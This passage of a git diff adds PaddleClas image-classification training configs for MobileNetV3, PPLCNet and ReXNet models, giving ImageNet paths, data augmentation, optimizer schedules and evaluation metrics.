+ - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: 
ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_small_x1_25.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_small_x1_25.yaml new file mode 100644 index 0000000..7db67b5 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/MobileNetV3/MobileNetV3_small_x1_25.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + +# model architecture +Arch: + name: MobileNetV3_small_x1_25 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: 
Cosine + learning_rate: 1.3 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00002 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x0_25.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x0_25.yaml new file mode 100644 index 0000000..6773af7 --- /dev/null +++ 
b/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x0_25.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + class_num: 1000 + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference +# model architecture +Arch: + name: PPLCNet_x0_25 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.8 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00003 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - 
DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x0_35.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x0_35.yaml new file mode 100644 index 0000000..36aa3dc --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x0_35.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + class_num: 1000 + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference +# model architecture +Arch: + name: PPLCNet_x0_35 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.8 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00003 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + 
num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x0_5.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x0_5.yaml new file mode 100644 index 0000000..3ffc493 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x0_5.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + class_num: 1000 + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference +# model architecture +Arch: + name: PPLCNet_x0_5 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + 
lr: + name: Cosine + learning_rate: 0.8 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00003 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x0_75.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x0_75.yaml new file mode 100644 index 0000000..24ad8f3 --- /dev/null +++ 
b/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x0_75.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + class_num: 1000 + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference +# model architecture +Arch: + name: PPLCNet_x0_75 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.8 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00003 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - 
DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x1_0.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x1_0.yaml new file mode 100644 index 0000000..0921db5 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x1_0.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + class_num: 1000 + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference +# model architecture +Arch: + name: PPLCNet_x1_0 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.8 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00003 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + 
num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x1_5.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x1_5.yaml new file mode 100644 index 0000000..290d1c0 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x1_5.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + class_num: 1000 + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference +# model architecture +Arch: + name: PPLCNet_x1_5 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + 
lr: + name: Cosine + learning_rate: 0.8 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00004 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x2_0.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x2_0.yaml new file mode 100644 index 0000000..c8f7a3c --- /dev/null +++ 
b/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x2_0.yaml @@ -0,0 +1,129 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + class_num: 1000 + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference +# model architecture +Arch: + name: PPLCNet_x2_0 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.8 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00004 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - 
DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x2_5.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x2_5.yaml new file mode 100644 index 0000000..2ea69e3 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/PPLCNet/PPLCNet_x2_5.yaml @@ -0,0 +1,130 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + class_num: 1000 + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 360 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference +# model architecture +Arch: + name: PPLCNet_x2_5 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + epsilon: 0.1 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Cosine + learning_rate: 0.8 + warmup_epoch: 5 + regularizer: + name: 'L2' + coeff: 0.00004 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - AutoAugment: + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 512 + drop_last: False + shuffle: True + 
loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ReXNet/ReXNet_1_0.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ReXNet/ReXNet_1_0.yaml new file mode 100644 index 0000000..9406bfe --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ReXNet/ReXNet_1_0.yaml @@ -0,0 +1,132 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: ReXNet_1_0 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + 
+Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - RandCropImage: + size: 224 + - RandFlipImage: + flip_code: 1 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: True + loader: + num_workers: 4 + use_shared_memory: True + + Eval: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/val_list.txt + transform_ops: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + sampler: + name: DistributedBatchSampler + batch_size: 64 + drop_last: False + shuffle: False + loader: + num_workers: 4 + use_shared_memory: True + +Infer: + infer_imgs: docs/images/whl/demo.jpg + batch_size: 10 + transforms: + - DecodeImage: + to_rgb: True + channel_first: False + - ResizeImage: + resize_short: 256 + - CropImage: + size: 224 + - NormalizeImage: + scale: 1.0/255.0 + mean: [0.485, 0.456, 0.406] + std: [0.229, 0.224, 0.225] + order: '' + - ToCHWImage: + PostProcess: + name: Topk + topk: 5 + class_id_map_file: ppcls/utils/imagenet1k_label_list.txt + +Metric: + Train: + - TopkAcc: + topk: [1, 5] + Eval: + - TopkAcc: + topk: [1, 5] diff --git a/Smart_container/PaddleClas/ppcls/configs/ImageNet/ReXNet/ReXNet_1_3.yaml b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ReXNet/ReXNet_1_3.yaml new file mode 100644 
index 0000000..9f0b529 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/configs/ImageNet/ReXNet/ReXNet_1_3.yaml @@ -0,0 +1,132 @@ +# global configs +Global: + checkpoints: null + pretrained_model: null + output_dir: ./output/ + device: gpu + save_interval: 1 + eval_during_train: True + eval_interval: 1 + epochs: 120 + print_batch_step: 10 + use_visualdl: False + # used for static mode and model export + image_shape: [3, 224, 224] + save_inference_dir: ./inference + # training model under @to_static + to_static: False + +# model architecture +Arch: + name: ReXNet_1_3 + class_num: 1000 + +# loss function config for traing/eval process +Loss: + Train: + - CELoss: + weight: 1.0 + Eval: + - CELoss: + weight: 1.0 + + +Optimizer: + name: Momentum + momentum: 0.9 + lr: + name: Piecewise + learning_rate: 0.1 + decay_epochs: [30, 60, 90] + values: [0.1, 0.01, 0.001, 0.0001] + regularizer: + name: 'L2' + coeff: 0.0001 + + +# data loader for train and eval +DataLoader: + Train: + dataset: + name: ImageNetDataset + image_root: ./dataset/ILSVRC2012/ + cls_label_path: ./dataset/ILSVRC2012/train_list.txt + transform_ops: + - 